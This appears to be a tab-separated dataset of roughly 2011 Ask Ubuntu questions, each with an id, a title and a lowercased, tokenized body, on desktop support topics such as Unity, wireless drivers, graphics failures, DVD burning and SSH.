61671	tragedy after login unity from unity-greeter ( lightdm ) launched from processing unity	prorouge : ( naughty me haz launched unity-greeter ( lightdm ) on gnome-terminal with processing unity . i accidentally login with the same user with my single click . edit it seems it would be easier to figure it out by graphic : then i clicked the box and logged in . the theme all sessions in the same user account changes like the following : in my opinion , this maybe a problem of mis-detection of icon-theme ? or gtk+ theme ? or shell theme ? or , worst , the broken behavior of whole system before login i have try these steps but meaningless ( in my own user ) : reboot unity -- reset & & reboot rm -rf ~/.config/compiz & & reboot apply theme at system setting > appearance and reboot reinstall unity-greeter , lightdm here are the facts i have found out : ugly-themed interface in gnome3-fallback-session , unity 2d , unity with the same user normal interface in guest session broken shutdown function in whole system even before the broken user has been logged in ( in a new boot up process ) . according to fact # 3 , i weakly believe everything goes wrong before the broken user has been logged in . series of problems are brought out , something like unable to unlock user ( account ) setting with disabled unlock button ( and add & delete button ) crash in ubuntu software center due to the fact that i have found out many 'complication ' , i believe that i would reinstall the whole system if it can not be solved by fixing a little but major problem . thanks for involvement . : )
61672	what customisation options are available for the new unity launcher ?	i 'm looking to understand what are the customisation options available for the unity launcher in 11.10 . is it possible to modify ? : size of launcher , ( smaller than 32 px ? bigger than 64 ? ) position of the launcher color and opacity item organization , ( move items freely anywhere in the launcher , as workspaces for ex . ) any kind of other modification available . what tools do i need to install to perform these changes ?
61674	how can i make 'logout ' really work for vnc session	ubuntu 11.04 vncserver 4.1.1+xorg4.3.0-37ubuntu2 my .vnc/xstartup ends with gnome-session . when i select 'logout ' from the window on the upper right , gnome deletes all its bits , from the screen , but the session remains in existence . i wish that vncserver would get -kill-ed . is there a way to arrange this ?
61677	how can i evaluate the community behind an ubuntu package ?	before putting effort into configuring and trying to use a complex open source component , it is useful to have some idea as to whether bug reports or support requests are likely to get a response . i have a reasonable clue for how to do this for the original upstream source of something in ubuntu . however , when i see a version like : 6.2u5-1ubuntu1 , i know that the ubuntu dev community in particular is responsible for the package . this is particularly true if the upstream source bundle is difficult to build and thus it 's clear that whoever made the .deb for ubuntu did a lot of work . how can i track the provenance of an ubuntu debian and get some idea if the people who did it are still maintaining it ? is there some ubuntu index that maps packages to their packagers ? my example of the moment is gridengine-qmon and friends .
61679	how to change the search location of unity 's music lens with clementine instead of banshee ?	i know a similar question was asked by emyrb how do you change the search location of the music lens ? , but the answer says that the lens uses banshee , but i do n't use banshee , i use clementine . is there a way of getting the lens to actually read the music folder instead of banshee 's database ? if not , how hard is it to create a lens to look at your music folder ?
61682	how to collect kernel panic system crash reports ?	how can i collect kernel panic crash reports . i have a relatively new asus x53e system running 11.04 . i am experiencing system crashes regularly with caps lock light flashing and kernel panic screen but i do not know how to collect crash reports so as to report them . i do have a picture of it but do not know how to attach in these case
61683	which torrent client has preview mode ?	on windows i used bitcomet torrent client which has great feature - download files in preview mode so i can see movies right away . utorrent declared to be able to download files in preview mode but in real it does n't . which torrent client has real preview mode ?
61684	growisofs fails with unable to o_excl /dev/scd0 : someone was in time to remount ?	when trying to burn a dvd it sometimes happens that growisofs will fail with : $ sudo growisofs -speed=8 -dvd-compat -z /dev/scd0 -j -r . executing 'genisoimage -j -r . | builtin_dd of=/dev/scd0 obs=32k seek=0' i : -input-charset not specified , using utf-8 ( detected in locale settings ) 0.23 % done , estimate finish fri sep 16 14:49:33 2011 0.46 % done , estimate finish fri sep 16 14:49:33 2011 0.69 % done , estimate finish fri sep 16 14:49:33 2011 : - ( unable to o_excl /dev/scd0 : someone was in time to remount ? this only seems to happens when burning multiple dvd 's in a row and i think it happens when i eject an automounted disc without manually unmounting it first , which implies that something is keeping the drive busy , lsof and fuser however fail to find a process still accessing the drive . rebooting makes the problem go away . how can i find out what process is causing this issue ?
61690	ssh -x `` xt error : ca n't open display : :0.0 ''	i 'm trying to open xterm on my remote server ( ubuntu server 10.04 ) with ssh : ssh -x name @ machine xterm but the error returned is : xterm xt error : ca n't open display : :0.0` i googled and tried everything i found . still getting this error . the display-variable should be set automatically , right ? part of sshd_config : x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes any advice ?
61691	ubuntu one : u1conflict	i 'm running ubuntu 11.04 and using ubuntu one to sync my docs . i have about 500 .doc files , and i edit them constantly . i 'm having problems with the appearance of .u1conflict files . i have only one computer synced . please edit the following , it 's incomprehensible : has somehow to sync just on bootup/shudown to solve it ?
61692	dbus exception when using quickly	today i wanted to test quickly . i normally used : quickly create ubuntu-application appname to create the files of my aplication . it takes a long time and after a time it says dbus exception . here the output : sebi @ sebi-desktop : ~/dokumente $ quickly create ubuntu-application dropmind creating project directory dropmind creating bzr repository and committing ihr neu erstelltes projekt starten ! file 0/1 traceback ( most recent call last ) : file `` ./dropmind '' , line 33 , in dropmind.main ( ) file `` /home/sebi/dokumente/dropmind/dropmind/init.py '' , line 40 , in main preferences.db_connect ( ) file `` /home/sebi/dokumente/dropmind/dropmind_lib/preferences.py '' , line 50 , in db_connect self._database = couchdatabase ( self._db_name , create=true ) file `` /usr/lib/pymodules/python2.7/desktopcouch/application/server.py '' , line 101 , in init oauth_tokens=oauth_tokens , ctx=ctx ) file `` /usr/lib/pymodules/python2.7/desktopcouch/application/server.py '' , line 75 , in init oauth_tokens=oauth_tokens , ctx=ctx , views_factory=views_factory ) file `` /usr/lib/pymodules/python2.7/desktopcouch/records/database.py '' , line 123 , in init self._reconnect ( ) file `` /usr/lib/pymodules/python2.7/desktopcouch/application/server.py '' , line 81 , in _reconnect port = find_port ( ctx=self.ctx ) file `` /usr/lib/pymodules/python2.7/desktopcouch/application/platform/init.py '' , line 48 , in find_port return platform_find_port ( pid , ctx ) file `` /usr/lib/pymodules/python2.7/desktopcouch/application/platform/linux/init.py '' , line 100 , in platform_find_port proxy = bus.get_object ( 'org.desktopcouch.couchdb ' , '/ ' ) file `` /usr/lib/pymodules/python2.7/dbus/bus.py '' , line 244 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/pymodules/python2.7/dbus/proxies.py '' , line 241 , in init self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/pymodules/python2.7/dbus/bus.py '' , line 183 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/pymodules/python2.7/dbus/bus.py '' , line 281 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/pymodules/python2.7/dbus/connection.py '' , line 630 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . gl端ckwunsch , ihr neues projekt wurde erstellt . cd /home/sebi/dokumente/dropmind/ , um mit dem programmieren zu beginnen . to be honest . i had two days ago a little problem with unity and the reset did n't worked fully and so i just deleted the system files in my user folder like .gnome and so on . that fixed the problem with unity but may i deleted some other files which are important . i actually do n't know . at the end it says ti created the project succesfully but it does n't start the app and also not with the command quickly run it just does nothing then . i am using ubuntu 11.04 64bit .
61693	how to select and copy on emacs by keyboard ?	how to select by keyboard ? after selecting , i click menu 's edit , it shows 'copy ' . how to type copy by keyboard ? thank you~
61705	why does pkill autocomplete on alt+f1 terminal , but not on a regular x terminal ?	i pressed alt+f1 and logged in , and realized if i type pkill l and then tab twice , it will show me all the processes starting with l. so i went to gnome-terminal in x , and tried it , but i got nothing [ besides filenames ] . why does n't it work ?
61708	automatically sleep and wake-up at specific times	how can i hibernate or sleep my ubuntu 10.10 desktop and have it `` wake up '' the next day ? i have seen software that can do this on windows , so it ca n't be hard on ubuntu !
61709	terminal transparency ( urxvt ) , imagemagick , and x11 root window problem	i use ubuntu natty , urxvt ( with 256 colours ) , and imagemagick ( display -window root [ ... ] ) to set the root window to a picture . when i use the transparancy ( -tr ) option on urxvt , i get the ubuntu x login screen background ( the pink/purple one ) and not the image that is currently on the root window . see picture at the bottom . note that the same problem exists if i run gnome-terminal and set its transparency . i suspect that imagemagick is not drawing on the right x11 layer but i ( and google ) can not figure out what the right option is . could the problem be with either the xorg configuration or with window composition ? cross post from here and here in the vain hope that someone will know the answer here . if that offends , feel free to close . and it seems that it was indeed a vain hope ...
61710	configuring a persistent static ip address	i 'm trying to be able to access my localhost from any computer on the network . i 'm currently doing that by using the inet addr under ifconfig . but , everytime i restart the computer , it changes . how do i make it static to something like 192.168.1.100 ? i 've tried wicd , but when i use static ips , it wo n't let me connect to the internet at all . ( sorry for my naiveness with networking )
61713	computer crashes ( segfaults ? ) after upgrading from 1gb ram to 2gb	i have a hp compaq presario f500 ( an f579wm ) . i replaced the 1gb ( 2x512mb ) of ram in it with 2gb ( 2x1gb ) . since this upgrade the computer will switch to a text screen , with what looks like a backtrace or something . it often says something about a double fault or null pointer dereference . it does this rather unpredictably , though it tends to happen when you are trying to do something ( but will still happen if you leave it long enough ) . it often happens with firefox/chromium ( it could be me , but sometimes it seems like scrolling tends to cause it ) . it looks like it lists different programs ( compiz , chromium-browser , etc ) . i have run memtest for 10+ hr and got no errors . if if try each stick of ram individually , it works fine . i have tried using the nvidia driver . i 've tried using the nouveau driver . i 've tried using no 3d at all . still happens . if i run windows , i do n't experience any crashes in windows . ( so it must be some bug/setting problem with ubuntu ) . so , how do i fix this ( preferable ) or get the information to report a bug ? more details : the 2gb of memory is matching ; they are the same exact item . this model of laptop has two slots and ( supposedly ) support 2gb of ram . before i upgraded the ram , i had two sticks at 512mb each in it . i replaced those with two sticks of 1gb each ( which are the same product as each other ) . the odd thing is that the computer works fine in linux if i use one stick of 512mb and one of 1gb . ( windows works fine with two sticks of 1gb ) dmidecode says the maximum ram is 2gb , so i should n't be over the limit . [ output of sudo dmidecode ] after googling , i found this : https : //lkml.org/lkml/2011/3/27/17 if this is the same problem , how long will it take for the fix to be included in ubuntu ? [ example error screen ( reptyped ) ] [ 2nd example of error ] [ a third and fourth example ] - retrieved by ssh and tail -f /var/log/syslog
61719	why the software center does n't allow multiple downloads ?	i was wondering why the software center does n't download all the requested apps and install one by one as they finish to download . or instead why the software center does n't download an app while the other is installing
61720	can not find any wireless networks - networking service failing	my netbook is running ubuntu 10.04.03 lts ( lucid ) and everything was working perfectly till yesterday . it was connected to the internet through my thompson router and when i woke up , my wi-fi was visible but it could not connect to it ( kept prompting me for password which was obviously correct ) . i restarted the machine , and now it can not see any wireless networks at all ( i can see 3 wireless networks with my iphone , including my own wi-fi ) . some things that i noticed : 1 ) the networking service does not seem to work , and i can not do anything about it . for example the command : sudo service networking start gives : networking stop/waiting and the command : sudo service networking stop ( /restart ) gives : stop ( /restart ) : unknown instance : correct me if i 'm wrong but i think that this means that the service is in a weird `` waiting '' state and there is nothing that i can do to fix this . 2 ) i can see the wlan0 interface in the ifconfig + iwconfig commands . 3 ) the pan0 interface works without issues : i enabled internet tethering on my iphone and the netbook connected to it via bluetooth without issues . i have no clue regarding to what is wrong . if you need any more information please let me know with a comment . also , if there is like a way to reset everything regarding network interfaces to their default values i would like to know it . thanks in advance !
61723	graphics issues : black screen	i can not enable desktop effects from system > preferences > appearance . there also seems to be a big problem with my graphics in general , because many times i get a blank screen on booting . i have to reboot in recovery mode , and choose the `` run in failsafe graphic mode '' or `` resume normal boot '' and do my work in a simple cli interface . my machine has these specs , with a windows 7/ubuntu 10.04 dual boot . i was waiting for oneric hoping that it 'll have updated compatibility with my hardware . however , seeing the beta1 preview i have chosen to stick with the lts for the same reasons i downgraded from 11.04 . i have all the basic functionality that i need for work , but graphics is a big issue ( black screen on bootup , no desktop effects ) to make it my stable primary os . as you can realize from my post , i am a linux n00b . how can i fix my graphics issues ? on a sidenote , sometimes even when idle , my laptop begins to make a lot of noise and then subsides . is this related to my graphics problem , as this does n't happen on my windows boot . if so , i really need to fix it . i do n't play any games or run blu-ray or heavy video , etc . ( please tolerate my ignorance as i came to ubuntu from a mac background ) i did some searching but i ca n't troubleshoot my problem . i guess the following output is relevant lspci | grep vga 00:02.0 vga compatible controller : intel corporation device 0116 ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 0dcd ( rev a1 )
61725	how do i install burg ?	i found the source in launchpad for 11.04 and 10.10 but i do n't know how to install or compile it .
61736	configuring multiple monitors ( with xinerama ? )	i am trying to get multiple monitors ( i believe xinerama is the current solution ? ) set up and working with enlightenment . however , i noticed that ( 1 ) it 's hard to find current information and ( 2 ) , my xorg.conf file disappeared , ( now it 's xorg.conf.d/ ? ) , and i do n't seem to have an xorg.conf.d/ file for my monitor . multiple monitors works fine with the gnome default environment , but if i recall correctly , i just ticked a box to make that happen . what do i use to configure multiple monitors ?
61738	google desktop index path	google desktop save index file in home folder . index file is too large for home folder , so i need to move the file and also set new path for index file . how could i do this in google desktop ? there is a way in window but i did not find any post for linux . is it really possible to define google desktop index file path ?
61739	my trash icon from the taskbar sometimes disappears ?	the icon from the `` trash '' in the `` place '' folder of the desktop menu bar sometimes disappears with no reason ... it also bugs when i try to minimize a full window . im using ubuntu 11.04 with unity and it works amazing , its just that little bug . im new to ubuntu and this is my first time i try 11.04 natty .
61740	change mime-type in ubuntu	i am having strange problem , i think it is mime-type problem . i can not open file from firefox 's download window . it shows an error . it happens every time when i try to open file from firefox , from trash of unity panel , from stack of avant-window , 'open with folder ' in firefox-download . how to fix this ? i did not change any mime-type related file . i am using ubuntu 11.04 32 bit .
61744	how to make file association ( not with cli tool/command ) ?	in ubuntu 11.04 when i right click on a file in nautilus and chose `` open with '' i could select application and tick on check box to make it default application for certain file type in 11.10 there is no such option , so i 'm wondering what 's alternative to it now ?
61750	how to enable the hp quickplay buttons ?	i have an hp pavilion dv2000 and it has a pretty nice blue buttons over the keyboard , some are for multimedia ( which work perfectly ) , and other two are for launch a dvd application and a multimedia center on windows , however , those does n't work for anything on ubuntu , because they are not even recognized as keyboard buttons . so how can i activate them ?
61751	is it possible to update just the unity plugin in compiz to the latest/greatest for testing ?	i am currently using ubuntu 11.04 natty . can i update , or upgrade , just the unity compiz plugin ?
61756	impress text autoscaling broken ?	usually the textsize adapts to fit the slide , but on one slide it does n't work . there are n't any spaces at the end and if i disable the bullets the text scales fine . is this a bug or intended and is there a workaround ? i use version 3.4 . screenshot :
61767	automatically remounting a usb drive after usb errors	i have a shuttle xs fanless computer with a double usb hard drive . it gets quite hot and the usb stack crashes in ubuntu 11.04 . this causes usb disks to eject , i 'd like to make the computer remount usb drives after a certain amount of time . how is this possible ?
61775	how to uninstall unity in ubuntu 11.04 , not disable it	how can i uninstall or purge the unity desktop completely from ubuntu11.04 , not disable it , exactly remove it ?
61777	ssd install problem on dell mini 10v	long story short : i was a happy user of the first generation ( screen resolution : 1024x576 ) , with a 8gb ssd . but smart warned me about a forthcoming disk error , so i had purchased one ocz vertex plus 60g ssd , and planned to do a fresh install , download universal-usb-installer-1.8.6.3.exe and 11.04 image , create my installer key . but there goes the horror : first ( normal ) installation seemed to be successful . i had used the installer 's formatting tool , with 15g as / 2.5 g swap , and the rest for /home . but after the reboot ( the installer usb media still plugged in ) , the third partition was not recognized/mounted automatically . even worse : i had tried to mount manually via mount -t ext4 /dev/sda /home but i was out of luck as it complained about bad fs type , superblock ... . so i did a mkfs.ext4 /dev/sda3 , but still ca n't mount . even worse : after unplugging the usb installer and rebooting i was greeted with grub error 17 . ok read a lot , reinstall , this time format with gparted ( from the ubuntu menu ) using gpt partition table , this time : 2.5 g swap , the rest is / , then run the installer , and used the previously created partitions . after rebooting with the usb installer still plugged in everything seemed normal . after unplugging the usb and rebooting , i was greeted with grub unknown fs , with grub rescue > where i was n't able to boot : - ( ( and 4 ... .6 ) read and research a lot , tried archlinux ( shame on me , i love that distro too ) , same story either with partitioning via gfdisk , using gpt table , then tried fdisk -h 32 -s 32 /dev/sda as described here : https : //wiki.archlinux.org/index.php/solid_state_drives and double checked the results as recommended : https : //wiki.archlinux.org/index.php/ssd_memory_cell_clearing # post_process_observation but the results are the same : i can boot with my usb plugged in ( and if there are more then one partition the last is not recognized ) . after unplugging the usb key , i ca n't boot . i had also tried the recommendation to create the 1 mb bios boot partition on the gpt partition ( same archlinux ssd wiki page ) , still no luck . i had tried without the bios boot , and syslinux bootloader . still no luck . i really need that machine to work on monday . could somebody help me out ? thanks in advance , zsolt
61780	how to merge a lot of folders into one ?	i have a lot of folders that i need to merge . i know that if i drag the content from all of them over another one i can merge them . but with so many folders it will take me hours . so , i need a way of merging all the folders inside a directory , with a bash script , or a program that does that . edit as a plus , i would like it if the folder structure was preserved and inside all the folders there will be folders with the same names . these folders need to be merged .
61785	how do i install a plugin for gedit v3 ?	i just installed the ubuntu 11.10 , and i want to install a plugin for gedit . i unpacked the plugin to the following folder : ~/.gnome2/gedit/plugins but in the gedit does n't show up the plugin .
61787	ubuntu 11.04 displays white lines when falling to prompt	first , i tried installing ubuntu server 11.04 on an older pc of mine in order to make it a file/ftp and web server . the installation went fine , but when i tried booting i only got a bunch of white lanes splashed across the display . it is n't frozen , since i can see the hd is showing signs of life during boot and after . after wasting two days on this , i decided i 'd try my luck with the desktop edition instead . i was able to set everything up as i wanted with it , but the issue persisted - if i ctrl + alt + f12 i still get that same garbled , white lines screen . i know it is working , as i can access it remotely ( smb , ftp or http ) . the same thing happens on boot as well - no ubuntu splash or anything - either a black screen or a mess of random white pixels . installing or removing drivers does n't make a difference . the monitor is an old crt , do n't know the exact model . it 's maximum resolution is 1600x1200 . the graphic card is an nvidia geforce 7100 gs ( 64mb ) . thank you .
61789	unable to login to ubuntu one files with samsung galaxy tab	when i try to log on to the ubuntu one files app on my samsung galaxy tab i get the response org.apache.http.client.httpresponseexception : unauthorized i 'm trying to log on using my wifi , the app works on my android mobile , the tab shows under my applications page on the webpage and is listed as granted , i have uninstalled the app and reinstalled it again . is there something i can do to make the app work on my tab ?
61790	startup script for starting applications in certain workspaces and positions	since ubuntu 11.04 has removed the session save feature , is it possible to write a script to open certain applications in specified workspaces and set their position ? please provide an example ( for terminal , browser and etc . ) .
61792	`` you do not appear to be using the nvidia x server '' ( screenshot included )	i am running ubuntu 11.04 at my asus laptop . laptop specs : cpu : i5-2410m @ 2,3ghz ram : 4gb gpu : nvidia gforce gt 520m / ( also the cpu has a bult-in graphics processor ) i am getting this error when i am trying to access the x server settings : also , there is no xconfig file in the etc/x11 directory . only the `` xorg.cong.backup '' . i 've tried sudo startx and i got this : fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . please consult the the x.org foundation support at http : //wiki.x.org for help . ddxsiggiveup : closing log xio : fatal io error 11 ( resource temporarily unavailable ) on x server `` :0 '' after 7 requests ( 7 known processed ) with 0 events remaining . what is wrong ? thank you for your time !
61794	black screen on a dell inspiron 1501 with a radeon xpress 200m	when attempting to run the ubuntu 11.04 live cd on my wife 's laptop , i consistently get a black screen with multicolored vertical bars - no video . this happens only when using kernel mode setting . when i boot with modesetting off , it boots without problems . however , i 'm not really interested in using natty in fallback mode , and would like to try out the 3d accelerated version . i believe that it should be supported on my hardware ( radeon rs482 - radeon xpress 200m ) . is this just a bug for which there is currently no fix , or is there some workaround for it ? update : this also happens with the latest 11.10 beta1 .
61795	wireless does not connect after suspend on thinkpad t61	i have a problem similar to reported here : when i resume my computer from suspend it does n't want to connect to any wireless connection . it looks like it is connecting , but after a while it asks me to retype a password for wireless connection . it connects after i restart it '' in my case it happens on ubuntu 11.04 thinkpad t61 with intel pro/wireless 4965 ag . is there a way to fix the issue by some `` magic '' sequence of commands without rebooting ? btw , the sequence of sudo service network-manager stop sudo rmmod iwlagn sudo modprobe iwlagn sudo service network-manager start from here did not help system details : $ sudo lshw -class network description : wireless interface product : pro/wireless 4965 ag or agn [ kedron ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 61 serial : 00:1d : e0:20 : a3:47 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=2.6.38-10-generic firmware=228.61.2.24 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:49 memory : df3fe000-df3fffff $ iwconfig wlan0 wlan0 ieee 802.11abgn essid : '' mynet '' mode : managed frequency:2.442 ghz access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off
61797	no wireless n on intel 5100	i 've got a d-link dir-655 router and a laptop with a intel wifi link 5100 network card . i 'm running ubuntu 11.4 x64 - uname -a : linux fraekkert 2.6.38-11-generic # 48-ubuntu smp fri jul 29 19:02:55 utc 2011 x86_64 x86_64 x86_64 gnu/linux i 've configured the router to allow both wireless g and n , and another laptop is connecting over n , but this laptop wont . i remember that wireless n were temporarily disabled when natty came out , but i ca n't figure out if anything have happened since then , so i guess the memory leak must 've been resolved by now . this is the output from lshw : *-network description : wireless interface product : wifi link 5100 vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 00 serial : 00:24 : d6:65:0d : d0 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=2.6.38-11-generic firmware=8.83.5.1 build 33692 ip=192.168.0.100 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:45 memory : e3500000-e3501fff and the output from dmesg | grep iwl : [ 20.943539 ] iwlagn : intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 20.943544 ] iwlagn : copyright ( c ) 2003-2010 intel corporation [ 20.943691 ] iwlagn 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 20.943703 ] iwlagn 0000:01:00.0 : setting latency timer to 64 [ 20.943750 ] iwlagn 0000:01:00.0 : detected intel ( r ) wifi link 5100 agn , rev=0x54 [ 20.966066 ] iwlagn 0000:01:00.0 : device eeprom ver=0x11f , calib=0x4 [ 20.966071 ] iwlagn 0000:01:00.0 : device sku : 0xb [ 20.966370 ] iwlagn 0000:01:00.0 : tunable channels : 13 802.11bg , 24 802.11a channels [ 20.966466 ] iwlagn 0000:01:00.0 : irq 45 for msi/msi-x [ 25.869658 ] iwlagn 0000:01:00.0 : loaded firmware version 8.83.5.1 build 33692 [ 25.879814 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' edit : the interface is working , but only in g-mode . if i turn my access point to n-only , i ca n't connect to it . the output of rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : no
61798	how do you switch the audio out from the speakers to a usb speaker from the command line ?	i know how to switch the audio out device using the speaker menu item , but how does one do this from the command line ? i 'd like to write some shell scripts around this functionality .
61800	how to batch convert an image to a pdf ?	i want to batch convert images ( jpg , png , etc . ) to pdf . converting them directly to pdf is easy with : convert in.jpg out.pdf however i need some more options , such as setting the output page size , margins and rotation between landscape and portrait format . after some trial and error i have come up with : convert -rotate `` 90 > '' -page a4+0+0 -gravity center in.jpg out.pdf this centers the image on an a4 page and automatically rotates between landscape and portrait , however it only works with small images below 595x842 . larger images break , as 595x842 seems to be the resolution in pixel that is assigned to an a4 page . reading around on the net , -density option might be a potential solution to increase the pixel count on an a4 page , but i could n't make it work . solutions outside of imagemagick are of course welcome as well .
61801	xml reader for my big files	i 'm looking for big xml reader , i tried xml copy editor , but it ca n't handle the big xml files ( 20-50mb ) i have . i do n't want to edit the xml , only browsing that .
61805	how to install a limited bootloader	when i installed ubuntu on my usb flash drive ( a proper permanent install , not a live cd with casper ) , the installer recognized the operating system on the host computer , a laptop , and made an entry in grub for it . now , i want to use this usb thumb drive on any computer i go to , so the vista entry will be useless on some other pc . i mentioned laptop because i tried to disconnect the hdd ( on which vista is installed ) in the bios setup , but apparently laptop bios 's do n't always have this option . so , what bootloader can i install that will only boot from the boot partition of my usb thumb drive ?
61808	working with printers in ubuntu with the unity desktop	how to i find my printer and stop print jobs that were not completed in ubuntu with the unity desktop ?
61817	how do i submit feedback on the ubuntu font ?	i 've joined the ubuntu font family interest group and i 'd like to provide feedback on the mono beta font , or , at least see if other people have reported the same issue i 'm seeing . what 's the best way to engage with the ubuntu font folks ?
61826	how do i check the sha1 hash of a file ?	how do i check the sha1 hash of a file ?
61830	do all android phones tether ?	can i pick up any android phone and connect it to my ubuntu laptop via a usb cable and tether to the internet using the data allowance on my phone contract ? i already know that my contract allows tethering at no additional charge .
61831	cross-platform direct file transfer across the internet	i want to directly transfer a file from a friend 's pc running windows to my ubuntu box over the internet . what are my options ? for security reasons , i do n't want to use a third-party server . hopefully , it 's something not something complicated or command line based that requires a learning curve since i am the one requesting the friend to send the file to me .
61839	how do i swap between unity-2d and ubuntu classic ?	i have changed my system to unity-2d , i believe it 's called , and would like to get back to ubuntu classic but do n't know how . can someone help ?
61843	how can i make claws mail the preferred email client ?	i have read here , changing email application in preferred applications ? , how to access mimeapps.list but i can not figure out what needs to be entered for claws mail to act as preferred . i have tried x-scheme-handler/mailto=claws-mail.desktop and x-scheme-handler/mailto=claws-mail but neither seems to work .
61845	how can i switch from desktop to server without reinstalling via cd ?	i recently installed ubuntu desktop on an older machine , and the performance is n't what i 'd like . i 'd like to switch it over to server ( server kernel , drop the gui , etc ) with minimal hassle . what 's the simplest way for me to do this , preferably without re-installing from cd ?
61859	new to ubuntu but have two problems	i have just installed ubuntu and i am very pleased , however i have two problems : i do n't have unity so ran the test and i have been told : not software rendered : no glx texture from pixmap : no unity supported : no i really want unity but due to this i am unaware on what to do . also , when downloading software in ubuntu software center it will not let me download apps . it comes up with waiting for apt-get to exit is there anything i need to do so i can download these ? i have the pny gtx560 and no , i have n't installed any drivers yet as i did n't know i had to .
61861	ubuntu 11.04 and 10.04 hang with black screen while installing from usb disk	i 've been trying to install ubuntu 11.04 from a usb flash stick and each time i try to boot from the usb key one of two things happen : a ) the screen that asks you what you would like to do ( e.g . run ubuntu from the usb key or install it ) shows up and the countdown to the default option starts to count down but as soon as i either touch the keyboard ( sometimes i press enter or the arrow keys to select an option ) or the countdown gets to zero the screen just locks up and nothing happens no matter how long i wait . b ) when i boot from the usb key the screen will flicker for a second and then go black with a flashing white underscore at the top left corner of the screen . again it does n't matter how long i wait , nothing happens and pressing keys does n't do a thing . the very first time i tried to install it i got a terminal-like screen that said something about a directory called 'casper ' having an error of some sort . i have tried installing from usb using both 11.04 and 10.10 . i 'm about to try 10.04 . i have read tons of forum posts about this but so far i have n't seen anything in the solutions that apply to me . my intention is to dual boot windows 7 and ubuntu . i must keep windows as i am required to use visual studio for one of my college courses . right now i 'm using wubi but i really want a full install . i ca n't use lvpm because it does n't work with the version of wubi i used . so now i 'm thinking my best bet is to try to get a clean install working . i 'd also convert wubi to a full install too but there 's no solution as far as i 've read . so could someone tell me a reason why this is happening or if there 's something i can do to get around the problem ? i 'm using a gateway lt2802u netbook with and intel atom n455 processor , 1gb ram , intel graphics media accelerator 3150 graphics card , and a 250gb hdd . i do n't have anything on my current wubi install that i ca n't replace so keep in mind when answering that i do n't care if i lose my current settings and files from wubi . thanks everyone !
61862	how to install avidemux ?	i recently upgraded to oneiric beta 1 , and now i need to use avidemux to convert some video files . it seems that it 's been removed and when i try to install it , i receive the following : package avidemux is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libavidemux0 e : package 'avidemux ' has no installation candidate any help is appreciated .
61863	black screen where once there was a login screen after installing shotwell	i was on my 10.04 machine this evening when i decided to run an update . the packages were from the flexiondotorg ppa which is for backports of shotwell . shotwell had an update 2days ago so i was surprised to see more . they were for libglib2.0 and libc-bin . after logging out i got the blank screen . could these have knackered the machine ?
61869	how do i install the frutiger font ?	could n't find it in synaptic nor in help.ubuntu
61872	where do i find orca in ubuntu classic	where do i find orca in ubuntu classic ?
61874	wubi - installation deleted ?	ok , i think i already know the answer to this one , but it 's important i try a bit more . i have been using a wubi installation of xubuntu for about a month , keeping my windows installation for some data i needed . it 's been working fine until this morning when i got to the usual boot menu , but trying to boot into xubuntu simply sent me to the grub screen . imagining it was something broken in the mbr or similar i booted into a sysrescue cd that i knew would come in handy and booted into an xfce session . i mounted my windows partition and found that the disk i was expecting to find at /mnt/windows/ubuntu/ ... was gone . there was simply nothing there . it 's not a pain to re-install ubuntu , and i am now intending to ditch windows permanently ( or possibly keep it on a small partition for testing ) , but i had about 2 days work of solid project on the drive , which i had n't backed up because i was working on it as a test , and had n't realised how much there was until it was gone . is there any way i can get this back ? if i knew roughly what data would be on the disk then i could find it and undelete it ? i have n't booted into windows or done any io , so i 'm holding out hope and not formatting the disk ( yet )
61878	how can i disable the `` popping '' sound when adjusting the volume ?	whenever i adjust the volume there 's a popping sound to indicate when the volume is changing . i find it really annoying . is there any way to change/disable this behaviour ?
61884	how do i save error message from console ?	my laptop crashes ( which is another question ) and when it does so it swiches to a text console and outputs an error which is too long to type ( like this ) . i ca n't do anything with it other than sometimes restart x ( otherwise restart the computer ) when it crashes . is there any way i can get this error so i can post it ? a log somewhere ? i 've tried ssh and conspy , but networking seems to get cut off .
61890	how to make firefox use notifyosd ?	i have a computer that has 10.04 installed on it . when i download something off the internet , notifyosd displays to say the download is complete ( firefox is using notifyosd ) . i 'm using 11.04 on another computer . when firefox finishes downloading something it displays the `` firefox notifier '' that pops up in the lower right corner of the monitor to tell me the download is complete ( firefox is not using notifyosd ) . can this be fixed ? i 'd like for firefox to use notifyosd on 11.04 like it is on 10.04 .
61891	how do i bring a vm created with testdrive under kvm or qemu ?	after installing oneiric with testdrive , how do i bring it under aqemu or kvm ?
61893	share first ssh connection to user @ host opportunisitically using controlmaster	i see from the ssh_config man page that you can share connections to host @ user using controlpath and controlmaster . is there any way to do this opportunistically for each combination of local user , remote user , and remote host ? so that the first connection to testuser @ remotelaptop is shared when you ssh into it the second time and the first is still running ? ( i use ssh keys . i 'm not sure if that would make it easier or harder ) .
